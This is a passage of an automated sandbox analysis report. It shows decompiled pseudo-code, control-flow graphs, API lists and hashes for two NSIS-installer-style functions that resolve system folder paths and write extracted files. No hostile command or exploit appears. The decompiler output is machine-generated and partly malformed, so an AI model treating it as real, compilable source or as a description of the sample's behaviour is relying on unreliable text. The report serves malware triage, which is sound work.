                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8610331D01205ABDB209FA4DD85B9E7BA8AB04316F24417BF904F72D1D77C8E808B9D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 0040640A Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209stringCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 281 40640a-406415 282 406417-406426 281->282 283 406428-40643e 281->283 282->283 284 406444-406451 283->284 285 406656-40665c 283->285 284->285 286 406457-40645e 284->286 287 406662-40666d 285->287 288 406463-406470 285->288 286->285 290 406678-406679 287->290 291 40666f-406673 call 4063e8 287->291 288->287 289 406476-406482 288->289 292 406643 289->292 293 406488-4064c6 289->293 291->290 297 406651-406654 292->297 298 406645-40664f 292->298 295 4065e6-4065ea 293->295 296 4064cc-4064d7 293->296 301 4065ec-4065f2 295->301 302 40661d-406621 295->302 299 4064f0 296->299 300 4064d9-4064de 296->300 297->285 298->285 308 4064f7-4064fe 299->308 300->299 305 4064e0-4064e3 300->305 306 406602-40660e call 4063e8 301->306 307 4065f4-406600 call 40632f 301->307 303 406630-406641 lstrlenW 302->303 304 406623-40662b call 40640a 302->304 303->285 304->303 305->299 310 4064e5-4064e8 305->310 319 406613-406619 306->319 307->319 312 406500-406502 308->312 313 406503-406505 308->313 310->299 315 4064ea-4064ee 310->315 312->313 317 406540-406543 313->317 318 406507-406525 call 4062b6 313->318 315->308 321 406553-406556 317->321 322 406545-406551 GetSystemDirectoryW 317->322 324 40652a-40652e 318->324 319->303 320 40661b 319->320 325 4065de-4065e4 call 40667c 320->325 327 4065c1-4065c3 321->327 328 406558-406566 GetWindowsDirectoryW 321->328 326 4065c5-4065c9 322->326 329 406534-40653b call 40640a 324->329 330 4065ce-4065d1 324->330 325->303 326->325 332 4065cb 326->332 327->326 331 406568-406572 327->331 328->327 329->326 330->325 335 4065d3-4065d9 lstrcatW 330->335 337 406574-406577 331->337 338 40658c-4065a2 SHGetSpecialFolderLocation 331->338 332->330 335->325 337->338 340 406579-40658a 337->340 341 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 338->341 342 4065bd 338->342 340->326 340->338 341->326 341->342 342->327
                                                                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                                                                  			E0040640A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x46821c - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x470298 + _t43 * 2;
				_t44 = 0x4601e0;
				_t110 = 0x4601e0;
				if(_a4 >= 0x4601e0 && _a4 - 0x4601e0 >> 1 < 0x4000) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x4000;
					if((_t110 - _t44 & 0xfffffffe) >= 0x4000) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E0040640A(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x4601e0;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = L"start OK\r\n" + (_t106 << 0xe);
							E004063E8(_t110, L"start OK\r\n" + (_t106 << 0xe));
						} else {
							E0040632F(_t110,  *0x470248);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E0040667C(_t110);
						}
						goto L43;
					}
					_t86 =  *0x47024c;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x4702e4;
						if( *0x4702e4 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x2000);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x470244;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x470248,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x470248,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110);
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x2000);
							goto L30;
						} else {
							E004062B6( *0x470298, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x470298 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E0040640A(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E004063E8(_a4, _t44);
			}






























                                                                                                                                                                                                  0x0040640a
                                                                                                                                                                                                  0x0040640a
                                                                                                                                                                                                  0x0040640a
                                                                                                                                                                                                  0x00406410
                                                                                                                                                                                                  0x00406415
                                                                                                                                                                                                  0x00406426
                                                                                                                                                                                                  0x00406426
                                                                                                                                                                                                  0x0040642e
                                                                                                                                                                                                  0x0040642f
                                                                                                                                                                                                  0x00406430
                                                                                                                                                                                                  0x00406431
                                                                                                                                                                                                  0x00406434
                                                                                                                                                                                                  0x0040643c
                                                                                                                                                                                                  0x0040643e
                                                                                                                                                                                                  0x00406457
                                                                                                                                                                                                  0x0040645a
                                                                                                                                                                                                  0x0040645a
                                                                                                                                                                                                  0x00406656
                                                                                                                                                                                                  0x00406656
                                                                                                                                                                                                  0x0040665c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040646a
                                                                                                                                                                                                  0x00406470
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406478
                                                                                                                                                                                                  0x00406479
                                                                                                                                                                                                  0x0040647b
                                                                                                                                                                                                  0x0040647f
                                                                                                                                                                                                  0x00406482
                                                                                                                                                                                                  0x00406643
                                                                                                                                                                                                  0x00406651
                                                                                                                                                                                                  0x00406654
                                                                                                                                                                                                  0x00406654
                                                                                                                                                                                                  0x00406645
                                                                                                                                                                                                  0x00406648
                                                                                                                                                                                                  0x0040664b
                                                                                                                                                                                                  0x0040664d
                                                                                                                                                                                                  0x0040664d
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406643
                                                                                                                                                                                                  0x00406488
                                                                                                                                                                                                  0x0040648b
                                                                                                                                                                                                  0x0040649a
                                                                                                                                                                                                  0x004064a1
                                                                                                                                                                                                  0x004064ab
                                                                                                                                                                                                  0x004064af
                                                                                                                                                                                                  0x004064b2
                                                                                                                                                                                                  0x004064b5
                                                                                                                                                                                                  0x004064ba
                                                                                                                                                                                                  0x004064bf
                                                                                                                                                                                                  0x004064c3
                                                                                                                                                                                                  0x004064c6
                                                                                                                                                                                                  0x004065e6
                                                                                                                                                                                                  0x004065ea
                                                                                                                                                                                                  0x0040661d
                                                                                                                                                                                                  0x00406621
                                                                                                                                                                                                  0x00406626
                                                                                                                                                                                                  0x0040662b
                                                                                                                                                                                                  0x0040662b
                                                                                                                                                                                                  0x00406630
                                                                                                                                                                                                  0x00406631
                                                                                                                                                                                                  0x00406636
                                                                                                                                                                                                  0x00406639
                                                                                                                                                                                                  0x0040663c
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040663c
                                                                                                                                                                                                  0x004065ec
                                                                                                                                                                                                  0x004065ef
                                                                                                                                                                                                  0x004065f2
                                                                                                                                                                                                  0x00406607
                                                                                                                                                                                                  0x0040660e
                                                                                                                                                                                                  0x004065f4
                                                                                                                                                                                                  0x004065fb
                                                                                                                                                                                                  0x004065fb
                                                                                                                                                                                                  0x00406616
                                                                                                                                                                                                  0x00406619
                                                                                                                                                                                                  0x004065de
                                                                                                                                                                                                  0x004065df
                                                                                                                                                                                                  0x004065df
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406619
                                                                                                                                                                                                  0x004064cc
                                                                                                                                                                                                  0x004064d4
                                                                                                                                                                                                  0x004064d6
                                                                                                                                                                                                  0x004064d7
                                                                                                                                                                                                  0x004064f0
                                                                                                                                                                                                  0x004064f0
                                                                                                                                                                                                  0x004064f7
                                                                                                                                                                                                  0x004064f7
                                                                                                                                                                                                  0x004064fe
                                                                                                                                                                                                  0x00406502
                                                                                                                                                                                                  0x00406502
                                                                                                                                                                                                  0x00406503
                                                                                                                                                                                                  0x00406505
                                                                                                                                                                                                  0x00406540
                                                                                                                                                                                                  0x00406543
                                                                                                                                                                                                  0x00406553
                                                                                                                                                                                                  0x00406556
                                                                                                                                                                                                  0x0040655e
                                                                                                                                                                                                  0x00406564
                                                                                                                                                                                                  0x00406564
                                                                                                                                                                                                  0x004065c1
                                                                                                                                                                                                  0x004065c1
                                                                                                                                                                                                  0x004065c3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406568
                                                                                                                                                                                                  0x0040656f
                                                                                                                                                                                                  0x00406570
                                                                                                                                                                                                  0x00406572
                                                                                                                                                                                                  0x0040658c
                                                                                                                                                                                                  0x0040659a
                                                                                                                                                                                                  0x004065a0
                                                                                                                                                                                                  0x004065a2
                                                                                                                                                                                                  0x004065bd
                                                                                                                                                                                                  0x004065bd
                                                                                                                                                                                                  0x004065bd
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004065bd
                                                                                                                                                                                                  0x004065a8
                                                                                                                                                                                                  0x004065b3
                                                                                                                                                                                                  0x004065b9
                                                                                                                                                                                                  0x004065bb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004065bb
                                                                                                                                                                                                  0x00406574
                                                                                                                                                                                                  0x00406577
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406586
                                                                                                                                                                                                  0x00406588
                                                                                                                                                                                                  0x0040658a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040658a
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004065c1
                                                                                                                                                                                                  0x0040654b
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00406507
                                                                                                                                                                                                  0x00406525
                                                                                                                                                                                                  0x0040652a
                                                                                                                                                                                                  0x0040652e
                                                                                                                                                                                                  0x004065ce
                                                                                                                                                                                                  0x004065ce
                                                                                                                                                                                                  0x004065d1
                                                                                                                                                                                                  0x004065d9
                                                                                                                                                                                                  0x004065d9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004065d1
                                                                                                                                                                                                  0x00406536
                                                                                                                                                                                                  0x004065c5
                                                                                                                                                                                                  0x004065c5
                                                                                                                                                                                                  0x004065c9
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004065cb
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004065cb
                                                                                                                                                                                                  0x00406505
                                                                                                                                                                                                  0x004064d9
                                                                                                                                                                                                  0x004064de
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004064e0
                                                                                                                                                                                                  0x004064e3
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004064e5
                                                                                                                                                                                                  0x004064e8
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004064ea
                                                                                                                                                                                                  0x004064ea
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004064ea
                                                                                                                                                                                                  0x004064e8
                                                                                                                                                                                                  0x00406662
                                                                                                                                                                                                  0x0040666d
                                                                                                                                                                                                  0x00406679
                                                                                                                                                                                                  0x00406679
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(ExecToStack,00002000), ref: 0040654B
                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(ExecToStack,00002000,00000000,0043E708,?,00405487,0043E708,00000000), ref: 0040655E
                                                                                                                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,0043E708,?,00405487,0043E708,00000000), ref: 0040659A
                                                                                                                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,ExecToStack), ref: 004065A8
                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                                                                                                                  • lstrcatW.KERNEL32(ExecToStack,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                                                                                                                  • lstrlenW.KERNEL32(ExecToStack,00000000,0043E708,?,00405487,0043E708,00000000), ref: 00406631
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000014.00000002.399238187.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000014.00000002.399216302.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399337096.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399352909.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399369646.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399559254.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399581098.0000000000471000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000014.00000002.399594957.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_400000_wns22DB.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                  • String ID: ExecToStack$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$start OK
                                                                                                                                                                                                  • API String ID: 717251189-1285667439
                                                                                                                                                                                                  • Opcode ID: 23f28206d8b90664ce3613e71128f54d67ce4c932df2e69045dd5148352027ec
                                                                                                                                                                                                  • Instruction ID: 4ff03c26a92b18a500a2dba0a5346c99a5613c7aa05bf40b8fc1f2faf6c00e92
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23f28206d8b90664ce3613e71128f54d67ce4c932df2e69045dd5148352027ec
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59612271A00101ABDF209F64DD85AAE37A5AF50314F22813FE507BA2D1EB3D8EA1C75D
                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                  Function 0040176F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145stringtimeCOMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 408 40176f-401794 call 402c41 call 405d34 413 401796-40179c call 4063e8 408->413 414 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 408->414 419 4017b5-4017b6 call 40667c 413->419 414->419 423 4017bb-4017bf 419->423 424 4017c1-4017cb call 40672b 423->424 425 4017f2-4017f5 423->425 433 4017dd-4017ef 424->433 434 4017cd-4017db CompareFileTime 424->434 426 4017f7-4017f8 call 405eb9 425->426 427 4017fd-401819 call 405ede 425->427 426->427 435 40181b-40181e 427->435 436 40188d-4018b6 call 405450 call 4031d6 427->436 433->425 434->433 437 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 435->437 438 40186f-401879 call 405450 435->438 450 4018b8-4018bc 436->450 451 4018be-4018ca SetFileTime 436->451 437->423 470 401864-401865 437->470 448 401882-401888 438->448 453 402ace 448->453 450->451 452 4018d0-4018db FindCloseChangeNotification 450->452 451->452 455 4018e1-4018e4 452->455 456 402ac5-402ac8 452->456 458 402ad0-402ad4 453->458 459 4018e6-4018f7 call 40640a lstrcatW 455->459 460 4018f9-4018fc call 40640a 455->460 456->453 467 401901-4022fc call 405a4e 459->467 460->467 467->456 467->458 470->448 472 401867-401868 470->472 472->438
                                                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                                                  			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __edi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				void* _t81;
				void* _t82;
				WCHAR* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402C41(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x28) & 0x00000007;
				_t35 = E00405D34( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t84 = L"ExecToStack";
				if(_t35 == 0) {
					lstrcatW(E00405CBD(E004063E8(_t84, 0x4c9000)), ??);
				} else {
					E004063E8();
				}
				E0040667C(_t84);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040672B(_t84);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x1c);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405EB9(_t84);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405EDE(_t84, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x30) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405450(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x4702e8 =  *0x4702e8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x4702e8;
						goto L32;
					} else {
						E004063E8(0x4125d8, _t81);
						E004063E8(_t81, _t84);
						E0040640A(_t77, _t81, _t84, 0x40e5d8,  *((intOrPtr*)(_t86 - 0x14)));
						E004063E8(_t81, 0x4125d8);
						_t64 = E00405A4E(0x40e5d8,  *(_t86 - 0x28) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x4702e8 =  &( *0x4702e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t84);
								_push(0xfffffffa);
								E00405450();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405450(0xffffffea,  *(_t86 - 8));
				 *0x470314 =  *0x470314 + 1;
				_t45 = E004031D6(_t79,  *((intOrPtr*)(_t86 - 0x20)),  *(_t86 - 0x30), _t77, _t77); // executed
				 *0x470314 =  *0x470314 - 1;
				__eflags =  *(_t86 - 0x1c) - 0xffffffff;
				_t82 = _t45;
				if( *(_t86 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x30), _t86 - 0x1c, _t77, _t86 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x30)); // executed
				__eflags = _t82 - _t77;
				if(_t82 >= _t77) {
					goto L31;
				} else {
					__eflags = _t82 - 0xfffffffe;
					if(_t82 != 0xfffffffe) {
						E0040640A(_t77, _t82, _t84, _t84, 0xffffffee);
					} else {
						E0040640A(_t77, _t82, _t84, _t84, 0xffffffe9);
						lstrcatW(_t84,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t84);
					E00405A4E();
					goto L29;
				}
				goto L33;
			}


















                                                                                                                                                                                                  0x0040176f
                                                                                                                                                                                                  0x00401776
                                                                                                                                                                                                  0x00401782
                                                                                                                                                                                                  0x00401785
                                                                                                                                                                                                  0x0040178a
                                                                                                                                                                                                  0x0040178d
                                                                                                                                                                                                  0x00401794
                                                                                                                                                                                                  0x004017b0
                                                                                                                                                                                                  0x00401796
                                                                                                                                                                                                  0x00401797
                                                                                                                                                                                                  0x00401797
                                                                                                                                                                                                  0x004017b6
                                                                                                                                                                                                  0x004017bb
                                                                                                                                                                                                  0x004017bb
                                                                                                                                                                                                  0x004017bf
                                                                                                                                                                                                  0x004017c2
                                                                                                                                                                                                  0x004017c7
                                                                                                                                                                                                  0x004017c9
                                                                                                                                                                                                  0x004017cb
                                                                                                                                                                                                  0x004017d0
                                                                                                                                                                                                  0x004017d0
                                                                                                                                                                                                  0x004017db
                                                                                                                                                                                                  0x004017db
                                                                                                                                                                                                  0x004017ec
                                                                                                                                                                                                  0x004017ee
                                                                                                                                                                                                  0x004017ee
                                                                                                                                                                                                  0x004017ef
                                                                                                                                                                                                  0x004017ef
                                                                                                                                                                                                  0x004017f2
                                                                                                                                                                                                  0x004017f5
                                                                                                                                                                                                  0x004017f8
                                                                                                                                                                                                  0x004017f8
                                                                                                                                                                                                  0x004017ff
                                                                                                                                                                                                  0x0040180e
                                                                                                                                                                                                  0x00401813
                                                                                                                                                                                                  0x00401816
                                                                                                                                                                                                  0x00401819
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x0040181b
                                                                                                                                                                                                  0x0040181e
                                                                                                                                                                                                  0x00401874
                                                                                                                                                                                                  0x00401879
                                                                                                                                                                                                  0x004015b6
                                                                                                                                                                                                  0x0040288b
                                                                                                                                                                                                  0x0040288b
                                                                                                                                                                                                  0x00402ac5
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00402ac8
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00401820
                                                                                                                                                                                                  0x00401826
                                                                                                                                                                                                  0x0040182d
                                                                                                                                                                                                  0x0040183a
                                                                                                                                                                                                  0x00401845
                                                                                                                                                                                                  0x0040185b
                                                                                                                                                                                                  0x0040185b
                                                                                                                                                                                                  0x0040185e
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00401864
                                                                                                                                                                                                  0x00401864
                                                                                                                                                                                                  0x00401865
                                                                                                                                                                                                  0x00401882
                                                                                                                                                                                                  0x00402ace
                                                                                                                                                                                                  0x00402ace
                                                                                                                                                                                                  0x00402ace
                                                                                                                                                                                                  0x00401867
                                                                                                                                                                                                  0x00401867
                                                                                                                                                                                                  0x00401868
                                                                                                                                                                                                  0x00401493
                                                                                                                                                                                                  0x004022f7
                                                                                                                                                                                                  0x004022f7
                                                                                                                                                                                                  0x004022f7
                                                                                                                                                                                                  0x00401865
                                                                                                                                                                                                  0x0040185e
                                                                                                                                                                                                  0x00402ad0
                                                                                                                                                                                                  0x00402ad4
                                                                                                                                                                                                  0x00402ad4
                                                                                                                                                                                                  0x00401892
                                                                                                                                                                                                  0x00401897
                                                                                                                                                                                                  0x004018a5
                                                                                                                                                                                                  0x004018aa
                                                                                                                                                                                                  0x004018b0
                                                                                                                                                                                                  0x004018b4
                                                                                                                                                                                                  0x004018b6
                                                                                                                                                                                                  0x004018be
                                                                                                                                                                                                  0x004018ca
                                                                                                                                                                                                  0x004018b8
                                                                                                                                                                                                  0x004018b8
                                                                                                                                                                                                  0x004018bc
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004018bc
                                                                                                                                                                                                  0x004018d3
                                                                                                                                                                                                  0x004018d9
                                                                                                                                                                                                  0x004018db
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004018e1
                                                                                                                                                                                                  0x004018e1
                                                                                                                                                                                                  0x004018e4
                                                                                                                                                                                                  0x004018fc
                                                                                                                                                                                                  0x004018e6
                                                                                                                                                                                                  0x004018e9
                                                                                                                                                                                                  0x004018f2
                                                                                                                                                                                                  0x004018f2
                                                                                                                                                                                                  0x00401901
                                                                                                                                                                                                  0x00401906
                                                                                                                                                                                                  0x004022f2
                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                  0x004022f2
                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,004C9000,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00002000,00403576,00468240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                    • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                    • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                    • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                    • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
